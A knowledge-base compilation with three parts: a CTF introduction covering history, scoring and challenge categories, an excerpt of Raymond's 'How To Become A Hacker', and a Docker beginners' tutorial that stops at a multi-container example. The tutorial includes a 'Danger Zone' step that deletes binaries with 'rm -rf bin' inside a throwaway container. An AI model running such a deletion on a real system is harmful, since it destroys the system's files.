About this knowledge base

CTF 101

CTF Introduction

Capture The Flags, or CTFs, is a kind of computer security competition.

Teams of competitors (or just individuals) are pitted against each other in a test of computer security skills.

Very often CTFs are the beginning of one's cyber security career due to their team-building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.

Origin of CTF

CTF's predecessor is a traditional networking technology competition between hackers, which originated at the 4th DEFCON in 1996.

The first CTF competitions (1996 - 2001) had no clear rules and no professionally built competition platform and environment. It was up to the teams to prepare their own targets (prepare and defend their own targets, and try to break each other's targets). The organizers are mostly just non-professional volunteers who accept requests for manual scoring from the participating teams.

The lack of automated back-end systems and judges' technical competence, scoring delays and errors, as well as unreliable networks and improper configurations, led to a great deal of controversy and dissatisfaction.

The "Modern" CTF Competition

A professional team undertakes the competition platform, proposition, event organization, and automated point system. Teams are required to submit applications and are selected by the DEFCON conference organizers.

The following features stand out for the three years of DEFCON CTF competitions organized by LegitBS.

The competition focuses on core competencies in underlying computer and system security, and web vulnerability techniques are completely ignored. The competition environment tends to be a multi-CPU instruction architecture set, multi-operating system, and multi-programming language. Zero-sum" scoring rules are used. The team's comprehensive ability test: reverse analysis, vulnerability mining, vulnerability exploitation, vulnerability patching and reinforcement, network traffic analysis, system security operation and maintenance, and security programming debugging.

CTF Competition Types

Jeopardy is commonly used in online selection competitions. In Jeopardy CTF, teams can participate via the Internet or a live network, where they solve technical challenges in cybersecurity by interacting with the online environment or analyzing files offline to earn points, similar to ACM programming competitions and informatics Olympiads, and are ranked based on total points and time.

The different problem-solving problem-solving modes will generally set the first blood, and second blood, third blood, that is, the first three teams to complete the problem will get extra points, so this is not only the first team to solve the problem to encourage the value of the team, but also an indirect reflection of the team's ability.

Of course there is also a popular scoring rule that sets the initial score for each question and then gradually reduces the score of the question according to the number of teams that have successfully answered the question, meaning that the more people answer the question, the lower the score of the question will be. Eventually it will drop to a guaranteed score and then stop dropping.

The main types of questions include Web network attack and defense, RE reverse engineering, Pwn binary exploit, Crypto cryptographic attacks, Mobile mobile security, and Misc security miscellaneous six categories.

CTF Contest Contents

Since the CTF has a wide range of questions, there are no clear boundaries as to what will be tested. However, as far as the current competition questions are concerned, they are mainly classified according to the common Web network attack and defense, RE reverse engineering, Pwn binary vulnerability exploitation, Crypto cryptography attack, Mobile security, and Misc security.

Web - Web Attack and Defense

Mainly introduces the common vulnerabilities in Web security, such as SQL injection, XSS, CSRF, file inclusion, file upload, code audit, PHP weak types, etc., common questions and solutions in Web security, and provides some common tools.

Reverse Engineering - Reverse Engineering

Mainly introduces the common question types, tools platform, and solution ideas in Reverse Engineering, and the advanced part introduces the common software protection, decompiling, anti-debugging, shelling, and deshelling techniques in Reverse Engineering.

Pwn - binary vulnerability exploitation

The Pwn topic mainly examines the discovery and exploitation of binary vulnerabilities, which requires a certain understanding of the underlying computer operating system. PWN topics are mainly found on the Linux platform in the CTF competition.

Crypto - Cryptographic Attacks

Classical cryptography is interesting and diverse, while modern cryptography is highly secure and requires high algorithmic understanding.

Mobile - Mobile Security

Mainly introduces the common tools and main problem types in Android inversion. Android inversion often requires certain knowledge of Android development. iOS inversion topics are less frequent in CTF competitions, so not too much introduction is made.

Misc - Security Miscellaneous

The topic "Online Ghost: The Autobiography of Mitnick, the World's Number One Hacker" translated by Zhuge Jianwei, and some typical MISC topics are used as entry points, mainly including information gathering, coding analysis, forensic analysis, steganography analysis, etc.

How To Become A Hacker

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mindset is not confined to this software-hacker culture. Some people apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is independent of the particular medium the hacker works in. But in the rest of this document, we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, and crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
1. No problem should ever have to be solved twice.
1. Boredom and drudgery are evil.
1. Freedom is good.
1. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things are important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mindset of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, and in pushing themselves past their physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one to make it as a hacker. Otherwise, you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get the most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smothers you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kind of authority to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like the ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitudes and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Reference

https://ctf101.org/
http://www.catb.org/~esr/faqs/hacker-howto.html
https://ctf-wiki.org/

Docker for beginners

https://docker-curriculum.com/

by Prakhar Srivastav

Introduction

What is Docker?

Wikipedia defines Docker as

an open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation of OS-level virtualization on Linux.

Wow! That's a mouthful. In simpler words, Docker is a tool that allows developers, sys-admins, etc. to easily deploy their applications in a sandbox (called containers) to run on the host operating system i.e. Linux. The key benefit of Docker is that it allows users to package an application with all of its dependencies into a standardized unit for software development. Unlike virtual machines, containers do not have high overhead and hence enable more efficient usage of the underlying system and resources.

What are containers?

The industry standard today is to use Virtual Machines (VMs) to run software applications. VMs run applications inside a guest Operating System, which runs on virtual hardware powered by the server’s host OS.

VMs are great at providing full process isolation for applications: there are very few ways a problem in the host operating system can affect the software running in the guest operating system, and vice-versa. But this isolation comes at a great cost — the computational overhead spent virtualizing hardware for a guest OS to use is substantial.

Containers take a different approach: by leveraging the low-level mechanics of the host operating system, containers provide most of the isolation of virtual machines at a fraction of the computing power.

Why use containers?

Containers offer a logical packaging mechanism in which applications can be abstracted from the environment in which they run. This decoupling allows container-based applications to be deployed easily and consistently, regardless of whether the target environment is a private data center, the public cloud, or even a developer’s laptop. This gives developers the ability to create predictable environments that are isolated from the rest of the applications and can be run anywhere.

From an operations standpoint, apart from portability containers also give more granular control over resources giving your infrastructure improved efficiency which can result in better utilization of your compute resources.

Docker interest over time

Google Trends for Docker

Due to these benefits, containers (& Docker) have seen widespread adoption. Companies like Google, Facebook, Netflix, and Salesforce leverage containers to make large engineering teams more productive and to improve the utilization of computing resources. Google credited containers for eliminating the need for an entire data center.

What will this tutorial teach me?

This tutorial aims to be the one-stop shop for getting your hands dirty with Docker. Apart from demystifying the Docker landscape, it'll give you hands-on experience building and deploying your web apps on the Cloud. We'll be using Amazon Web Services to deploy a static website, and two dynamic web apps on EC2 using Elastic Beanstalk and Elastic Container Service. Even if you have no prior experience with deployments, this tutorial should be all you need to get started.

GETTING STARTED

This document contains a series of several sections, each of which explains a particular aspect of Docker. We will be typing commands (or writing code) in each section. All the code used in the tutorial is available in the GitHub repo.

Note: This tutorial uses version 18.05.0-ce of Docker. If you find any part of the tutorial incompatible with a future version, please raise an issue. Thanks!

Prerequisites

There are no specific skills needed for this tutorial beyond a basic comfort with the command line and using a text editor. This tutorial uses git clone to clone the repository locally. If you don't have Git installed on your system, either install it or remember to manually download the zip files from Github. Prior experience in developing web applications will be helpful but is not required. As we proceed further along the tutorial, we'll make use of a few cloud services. If you're interested in following along, please create an account on each of these websites:

Setting up your computer

Getting all the tooling setup on your computer can be a daunting task, but thankfully as Docker has become stable, getting Docker up and running on your favorite OS has become very easy.

Until a few releases ago, running Docker on OSX and Windows was quite a hassle. Lately however, Docker has invested significantly into improving the on-boarding experience for its users on these OSes, thus running Docker now is a cakewalk. The getting started guide on Docker has detailed instructions for setting up Docker on Mac, Linux and Windows.

Once you are done installing Docker, test your Docker installation by running the following:

$ docker run hello-world

Hello from Docker.
This message shows that your installation appears to be working correctly.
...

HELLO WORLD

Playing with Busybox

Now that we have everything setup, it's time to get our hands dirty. In this section, we are going to run a Busybox container on our system and get a taste of the docker run command.

To get started, let's run the following in our terminal:

$ docker pull busybox

Note: Depending on how you've installed docker on your system, you might see a permission denied error after running the above command. If you're on a Mac, make sure the Docker engine is running. If you're on Linux, then prefix your docker commands with sudo. Alternatively, you can create a docker group to get rid of this issue.

The pull command fetches the busybox image from the Docker registry and saves it to our system. You can use the docker images command to see a list of all images on your system.

$ docker images
REPOSITORY              TAG                 IMAGE ID            CREATED             VIRTUAL SIZE
busybox                 latest              c51f86c28340        4 weeks ago         1.109 MB

Docker Run

Great! Let's now run a Docker container based on this image. To do that we are going to use the almighty docker run command.

$ docker run busybox

Wait, nothing happened! Is that a bug? Well, no. Behind the scenes, a lot of stuff happened. When you call run, the Docker client finds the image (busybox in this case), loads up the container and then runs a command in that container. When we run docker run busybox, we didn't provide a command, so the container booted up, ran an empty command and then exited. Well, yeah - kind of a bummer. Let's try something more exciting.

$ docker run busybox echo "hello from busybox"
hello from busybox

Nice - finally we see some output. In this case, the Docker client dutifully ran the echo command in our busybox container and then exited it. If you've noticed, all of that happened pretty quickly. Imagine booting up a virtual machine, running a command and then killing it. Now you know why they say containers are fast! Ok, now it's time to see the docker ps command. The docker ps command shows you all containers that are currently running.

$ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES

Since no containers are running, we see a blank line. Let's try a more useful variant: docker ps -a

$ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
305297d7a235        busybox             "uptime"            11 minutes ago      Exited (0) 11 minutes ago                       distracted_goldstine
ff0a5c3750b9        busybox             "sh"                12 minutes ago      Exited (0) 12 minutes ago                       elated_ramanujan
14e5bd11d164        hello-world         "/hello"            2 minutes ago       Exited (0) 2 minutes ago                        thirsty_euclid

So what we see above is a list of all containers that we ran. Do notice that the STATUS column shows that these containers exited a few minutes ago.

You're probably wondering if there is a way to run more than just one command in a container. Let's try that now:

$ docker run -it busybox sh
/ # ls
bin   dev   etc   home  proc  root  sys   tmp   usr   var
/ # uptime
 05:45:21 up  5:58,  0 users,  load average: 0.00, 0.01, 0.04

Running the run command with the -it flags attaches us to an interactive tty in the container. Now we can run as many commands in the container as we want. Take some time to run your favorite commands.

Danger Zone: If you're feeling particularly adventurous you can try rm -rf bin in the container. Make sure you run this command in the container and not in your laptop/desktop. Doing this will make any other commands like ls, uptime not work. Once everything stops working, you can exit the container (type exit and press Enter) and then start it up again with the docker run -it busybox sh command. Since Docker creates a new container every time, everything should start working again.

That concludes a whirlwind tour of the mighty docker run command, which would most likely be the command you'll use most often. It makes sense to spend some time getting comfortable with it. To find out more about run, use docker run --help to see a list of all flags it supports. As we proceed further, we'll see a few more variants of docker run.

Before we move ahead though, let's quickly talk about deleting containers. We saw above that we can still see remnants of the container even after we've exited by running docker ps -a. Throughout this tutorial, you'll run docker run multiple times and leaving stray containers will eat up disk space. Hence, as a rule of thumb, I clean up containers once I'm done with them. To do that, you can run the docker rm command. Just copy the container IDs from above and paste them alongside the command.

$ docker rm 305297d7a235 ff0a5c3750b9
305297d7a235
ff0a5c3750b9

On deletion, you should see the IDs echoed back to you. If you have a bunch of containers to delete in one go, copy-pasting IDs can be tedious. In that case, you can simply run -

$ docker rm $(docker ps -a -q -f status=exited)

This command deletes all containers that have a status of exited. In case you're wondering, the -q flag, only returns the numeric IDs and -f filters output based on conditions provided. One last thing that'll be useful is the --rm flag that can be passed to docker run which automatically deletes the container once it's exited from. For one off docker runs, --rm flag is very useful.

In later versions of Docker, the docker container prune command can be used to achieve the same effect.

$ docker container prune
WARNING! This will remove all stopped containers.
Are you sure you want to continue? [y/N] y
Deleted Containers:
4a7f7eebae0f63178aff7eb0aa39f0627a203ab2df258c1a00b456cf20063
f98f9c2aa1eaf727e4ec9c0283bcaa4762fbdba7f26191f26c97f64090360

Total reclaimed space: 212 B

Lastly, you can also delete images that you no longer need by running docker rmi.

Terminology

In the last section, we used a lot of Docker-specific jargon which might be confusing to some. So before we go further, let me clarify some terminology that is used frequently in the Docker ecosystem.

Images - The blueprints of our application which form the basis of containers. In the demo above, we used the docker pull command to download the busybox image.
Containers - Created from Docker images and run the actual application. We create a container using docker run which we did using the busybox image that we downloaded. A list of running containers can be seen using the docker ps command.
Docker Daemon - The background service running on the host that manages building, running and distributing Docker containers. The daemon is the process that runs in the operating system which clients talk to.
Docker Client - The command line tool that allows the user to interact with the daemon. More generally, there can be other forms of clients too - such as Kitematic which provide a GUI to the users.
Docker Hub - A registry of Docker images. You can think of the registry as a directory of all available Docker images. If required, one can host their own Docker registries and can use them for pulling images.

WEBAPPS WITH DOCKER

Great! So we have now looked at docker run, played with a Docker container and also got a hang of some terminology. Armed with all this knowledge, we are now ready to get to the real-stuff, i.e. deploying web applications with Docker!

Static Sites

Let's start by taking baby-steps. The first thing we're going to look at is how we can run a dead-simple static website. We're going to pull a Docker image from Docker Hub, run the container and see how easy it is to run a webserver.

Let's begin. The image that we are going to use is a single-page website that I've already created for the purpose of this demo and hosted on the registry - prakhar1989/static-site. We can download and run the image directly in one go using docker run. As noted above, the --rm flag automatically removes the container when it exits and the -it flag specifies an interactive terminal which makes it easier to kill the container with Ctrl+C (on windows).

$ docker run --rm -it prakhar1989/static-site

Since the image doesn't exist locally, the client will first fetch the image from the registry and then run the image. If all goes well, you should see a Nginx is running... message in your terminal. Okay now that the server is running, how to see the website? What port is it running on? And more importantly, how do we access the container directly from our host machine? Hit Ctrl+C to stop the container.

Well, in this case, the client is not exposing any ports so we need to re-run the docker run command to publish ports. While we're at it, we should also find a way so that our terminal is not attached to the running container. This way, you can happily close your terminal and keep the container running. This is called detached mode.

$ docker run -d -P --name static-site prakhar1989/static-site
e61d12292d69556eabe2a44c16cbd54486b2527e2ce4f95438e504afb7b02810

In the above command, -d will detach our terminal, -P will publish all exposed ports to random ports and finally --name corresponds to a name we want to give. Now we can see the ports by running the docker port [CONTAINER] command

$ docker port static-site
80/tcp -> 0.0.0.0:32769
443/tcp -> 0.0.0.0:32768

You can open http://localhost:32769 in your browser.

Note: If you're using docker-toolbox, then you might need to use docker-machine ip default to get the IP.

You can also specify a custom port to which the client will forward connections to the container.

$ docker run -p 8888:80 prakhar1989/static-site
Nginx is running...

static site

To stop a detached container, run docker stop by giving the container ID. In this case, we can use the name static-site we used to start the container.

$ docker stop static-site
static-site

I'm sure you agree that was super simple. To deploy this on a real server you would just need to install Docker, and run the above Docker command. Now that you've seen how to run a webserver inside a Docker image, you must be wondering - how do I create my own Docker image? This is the question we'll be exploring in the next section.

Docker Images

We've looked at images before, but in this section we'll dive deeper into what Docker images are and build our own image! Lastly, we'll also use that image to run our application locally and finally deploy on AWS to share it with our friends! Excited? Great! Let's get started.

Docker images are the basis of containers. In the previous example, we pulled the Busybox image from the registry and asked the Docker client to run a container based on that image. To see the list of images that are available locally, use the docker images command.

$ docker images
REPOSITORY                      TAG                 IMAGE ID            CREATED             VIRTUAL SIZE
prakhar1989/catnip              latest              c7ffb5626a50        2 hours ago         697.9 MB
prakhar1989/static-site         latest              b270625a1631        21 hours ago        133.9 MB
python                          3-onbuild           cf4002b2c383        5 days ago          688.8 MB
martin/docker-cleanup-volumes   latest              b42990daaca2        7 weeks ago         22.14 MB
ubuntu                          latest              e9ae3c220b23        7 weeks ago         187.9 MB
busybox                         latest              c51f86c28340        9 weeks ago         1.109 MB
hello-world                     latest              0a6ba66e537a        11 weeks ago        960 B

The above gives a list of images that I've pulled from the registry, along with ones that I've created myself (we'll shortly see how). The TAG refers to a particular snapshot of the image and the IMAGE ID is the corresponding unique identifier for that image.

For simplicity, you can think of an image akin to a git repository - images can be committed with changes and have multiple versions. If you don't provide a specific version number, the client defaults to latest. For example, you can pull a specific version of ubuntu image

$ docker pull ubuntu:18.04

To get a new Docker image you can either get it from a registry (such as the Docker Hub) or create your own. There are tens of thousands of images available on Docker Hub. You can also search for images directly from the command line using docker search.

An important distinction to be aware of when it comes to images is the difference between base and child images.

Base images are images that have no parent image, usually images with an OS like ubuntu, busybox or debian.
Child images are images that build on base images and add additional functionality.

Then there are official and user images, which can be both base and child images.

Official images are images that are officially maintained and supported by the folks at Docker. These are typically one word long. In the list of images above, the python, ubuntu, busybox and hello-world images are official images.
User images are images created and shared by users like you and me. They build on base images and add additional functionality. Typically, these are formatted as user/image-name.

Our First Image

Now that we have a better understanding of images, it's time to create our own. Our goal in this section will be to create an image that sandboxes a simple Flask application. For the purposes of this workshop, I've already created a fun little Flask app that displays a random cat .gif every time it is loaded - because you know, who doesn't like cats? If you haven't already, please go ahead and clone the repository locally like so -

$ git clone https://github.com/prakhar1989/docker-curriculum.git
$ cd docker-curriculum/flask-app

This should be cloned on the machine where you are running the docker commands and not inside a docker container.

The next step now is to create an image with this web app. As mentioned above, all user images are based on a base image. Since our application is written in Python, the base image we're going to use will be Python 3.

Dockerfile

A Dockerfile is a simple text file that contains a list of commands that the Docker client calls while creating an image. It's a simple way to automate the image creation process. The best part is that the commands you write in a Dockerfile are almost identical to their equivalent Linux commands. This means you don't really have to learn new syntax to create your own dockerfiles.

The application directory does contain a Dockerfile but since we're doing this for the first time, we'll create one from scratch. To start, create a new blank file in our favorite text-editor and save it in the same folder as the flask app by the name of Dockerfile.

We start with specifying our base image. Use the FROM keyword to do that -

FROM python:3.8

The next step usually is to write the commands of copying the files and installing the dependencies. First, we set a working directory and then copy all the files for our app.

# set a directory for the app
WORKDIR /usr/src/app

# copy all the files to the container
COPY . .

Now, that we have the files, we can install the dependencies.

# install dependencies
RUN pip install --no-cache-dir -r requirements.txt

The next thing we need to specify is the port number that needs to be exposed. Since our flask app is running on port 5000, that's what we'll indicate.

EXPOSE 5000

The last step is to write the command for running the application, which is simply - python ./app.py. We use the CMD command to do that -

CMD ["python", "./app.py"]

The primary purpose of CMD is to tell the container which command it should run when it is started. With that, our Dockerfile is now ready. This is how it looks -

FROM python:3.8

# set a directory for the app
WORKDIR /usr/src/app

# copy all the files to the container
COPY . .

# install dependencies
RUN pip install --no-cache-dir -r requirements.txt

# define the port number the container should expose
EXPOSE 5000

# run the command
CMD ["python", "./app.py"]

Now that we have our Dockerfile, we can build our image. The docker build command does the heavy-lifting of creating a Docker image from a Dockerfile.

The section below shows you the output of running the same. Before you run the command yourself (don't forget the period), make sure to replace my username with yours. This username should be the same one you created when you registered on Docker hub. If you haven't done that yet, please go ahead and create an account. The docker build command is quite simple - it takes an optional tag name with -t and a location of the directory containing the Dockerfile.

$ docker build -t yourusername/catnip .
Sending build context to Docker daemon 8.704 kB
Step 1 : FROM python:3.8
# Executing 3 build triggers...
Step 1 : COPY requirements.txt /usr/src/app/
 ---> Using cache
Step 1 : RUN pip install --no-cache-dir -r requirements.txt
 ---> Using cache
Step 1 : COPY . /usr/src/app
 ---> 1d61f639ef9e
Removing intermediate container 4de6ddf5528c
Step 2 : EXPOSE 5000
 ---> Running in 12cfcf6d67ee
 ---> f423c2f179d1
Removing intermediate container 12cfcf6d67ee
Step 3 : CMD python ./app.py
 ---> Running in f01401a5ace9
 ---> 13e87ed1fbc2
Removing intermediate container f01401a5ace9
Successfully built 13e87ed1fbc2

If you don't have the python:3.8 image, the client will first pull the image and then create your image. Hence, your output from running the command will look different from mine. If everything went well, your image should be ready! Run docker images and see if your image shows.

The last step in this section is to run the image and see if it actually works (replacing my username with yours).

$ docker run -p 8888:5000 yourusername/catnip
 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)

The command we just ran used port 5000 for the server inside the container and exposed this externally on port 8888. Head over to the URL with port 8888, where your app should be live.

cat gif website

Congratulations! You have successfully created your first docker image.

Docker on AWS

What good is an application that can't be shared with friends, right? So in this section we are going to see how we can deploy our awesome application to the cloud so that we can share it with our friends! We're going to use AWS Elastic Beanstalk to get our application up and running in a few clicks. We'll also see how easy it is to make our application scalable and manageable with Beanstalk!

Docker push

The first thing that we need to do before we deploy our app to AWS is to publish our image on a registry which can be accessed by AWS. There are many different Docker registries you can use (you can even host your own). For now, let's use Docker Hub to publish the image.

If this is the first time you are pushing an image, the client will ask you to login. Provide the same credentials that you used for logging into Docker Hub.

$ docker login
Login in with your Docker ID to push and pull images from Docker Hub. If you do not have a Docker ID, head over to https://hub.docker.com to create one.
Username: yourusername
Password:
WARNING! Your password will be stored unencrypted in /Users/yourusername/.docker/config.json
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/credential-store

Login Succeeded

To publish, just type the below command remembering to replace the name of the image tag above with yours. It is important to have the format of yourusername/image_name so that the client knows where to publish.

$ docker push yourusername/catnip

Once that is done, you can view your image on Docker Hub. For example, here's the web page for my image.

Note: One thing that I'd like to clarify before we go ahead is that it is not imperative to host your image on a public registry (or any registry) in order to deploy to AWS. In case you're writing code for the next million-dollar unicorn startup you can totally skip this step. The reason why we're pushing our images publicly is that it makes deployment super simple by skipping a few intermediate configuration steps.

Now that your image is online, anyone who has docker installed can play with your app by typing just a single command.

$ docker run -p 8888:5000 yourusername/catnip

If you've pulled your hair out in setting up local dev environments / sharing application configuration in the past, you very well know how awesome this sounds. That's why Docker is so cool!

Beanstalk

AWS Elastic Beanstalk (EB) is a PaaS (Platform as a Service) offered by AWS. If you've used Heroku, Google App Engine etc. you'll feel right at home. As a developer, you just tell EB how to run your app and it takes care of the rest - including scaling, monitoring and even updates. In April 2014, EB added support for running single-container Docker deployments which is what we'll use to deploy our app. Although EB has a very intuitive CLI, it does require some setup, and to keep things simple we'll use the web UI to launch our application.

To follow along, you need a functioning AWS account. If you haven't already, please go ahead and do that now - you will need to enter your credit card information. But don't worry, it's free and anything we do in this tutorial will also be free! Let's get started.

Here are the steps:

Login to your AWS console.
Click on Elastic Beanstalk. It will be in the compute section on the top left. Alternatively, you can access the Elastic Beanstalk console.

Elastic Beanstalk start

Click on "Create New Application" in the top right
Give your app a memorable (but unique) name and provide an (optional) description
In the New Environment screen, create a new environment and choose the Web Server Environment.
Fill in the environment information by choosing a domain. This URL is what you'll share with your friends so make sure it's easy to remember.
Under base configuration section. Choose Docker from the predefined platform.

Elastic Beanstalk Environment Type

Now we need to upload our application code. But since our application is packaged in a Docker container, we just need to tell EB about our container. Open the Dockerrun.aws.json file located in the flask-app folder and edit the Name of the image to your image's name. Don't worry, I'll explain the contents of the file shortly. When you are done, click on the radio button for "Upload your Code", choose this file, and click on "Upload".
Now click on "Create environment". The final screen that you see will have a few spinners indicating that your environment is being set up. It typically takes around 5 minutes for the first-time setup.

While we wait, let's quickly see what the Dockerrun.aws.json file contains. This file is basically an AWS specific file that tells EB details about our application and docker configuration.

{
  "AWSEBDockerrunVersion": "1",
  "Image": {
    "Name": "prakhar1989/catnip",
    "Update": "true"
  },
  "Ports": [
    {
      "ContainerPort": 5000,
      "HostPort": 8000
    }
  ],
  "Logging": "/var/log/nginx"
}

The file should be pretty self-explanatory, but you can always reference the official documentation for more information. We provide the name of the image that EB should use along with a port that the container should open.

Hopefully by now, our instance should be ready. Head over to the EB page and you should see a green tick indicating that your app is alive and kicking.

EB deploy

Go ahead and open the URL in your browser and you should see the application in all its glory. Feel free to email / IM / snapchat this link to your friends and family so that they can enjoy a few cat gifs, too.

Cleanup

Once you done basking in the glory of your app, remember to terminate the environment so that you don't end up getting charged for extra resources.

EB deploy

Congratulations! You have deployed your first Docker application! That might seem like a lot of steps, but with the command-line tool for EB you can almost mimic the functionality of Heroku in a few keystrokes! Hopefully, you agree that Docker takes away a lot of the pains of building and deploying applications in the cloud. I would encourage you to read the AWS documentation on single-container Docker environments to get an idea of what features exist.

In the next (and final) part of the tutorial, we'll up the ante a bit and deploy an application that mimics the real-world more closely; an app with a persistent back-end storage tier. Let's get straight to it!

MULTI-CONTAINER ENVIRONMENTS

In the last section, we saw how easy and fun it is to run applications with Docker. We started with a simple static website and then tried a Flask app. Both of which we could run locally and in the cloud with just a few commands. One thing both these apps had in common was that they were running in a single container.

Those of you who have experience running services in production know that usually apps nowadays are not that simple. There's almost always a database (or any other kind of persistent storage) involved. Systems such as Redis and Memcached have become de rigueur of most web application architectures. Hence, in this section we are going to spend some time learning how to Dockerize applications which rely on different services to run.

In particular, we are going to see how we can run and manage multi-container docker environments. Why multi-container you might ask? Well, one of the key points of Docker is the way it provides isolation. The idea of bundling a process with its dependencies in a sandbox (called containers) is what makes this so powerful.

Just like it's a good strategy to decouple your application tiers, it is wise to keep containers for each of the services separate. Each tier is likely to have different resource needs and those needs might grow at different rates. By separating the tiers into different containers, we can compose each tier using the most appropriate instance type based on different resource needs. This also plays in very well with the whole microservices movement which is one of the main reasons why Docker (or any other container technology) is at the forefront of modern microservices architectures.

SF Food Trucks

The app that we're going to Dockerize is called SF Food Trucks. My goal in building this app was to have something that is useful (in that it resembles a real-world application), relies on at least one service, but is not too complex for the purpose of this tutorial. This is what I came up with.

SF Food Trucks

The app's backend is written in Python (Flask) and for search it uses Elasticsearch. Like everything else in this tutorial, the entire source is available on Github. We'll use this as our candidate application for learning out how to build, run and deploy a multi-container environment.

First up, let's clone the repository locally.

$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ tree -L 2
.
├── Dockerfile
├── README.md
├── aws-compose.yml
├── docker-compose.yml
├── flask-app
│   ├── app.py
│   ├── package-lock.json
│   ├── package.json
│   ├── requirements.txt
│   ├── static
│   ├── templates
│   └── webpack.config.js
├── setup-aws-ecs.sh
├── setup-docker.sh
├── shot.png
└── utils
    ├── generate_geojson.py
    └── trucks.geojson

The flask-app folder contains the Python application, while the utils folder has some utilities to load the data into Elasticsearch. The directory also contains some YAML files and a Dockerfile, all of which we'll see in greater detail as we progress through this tutorial. If you are curious, feel free to take a look at the files.

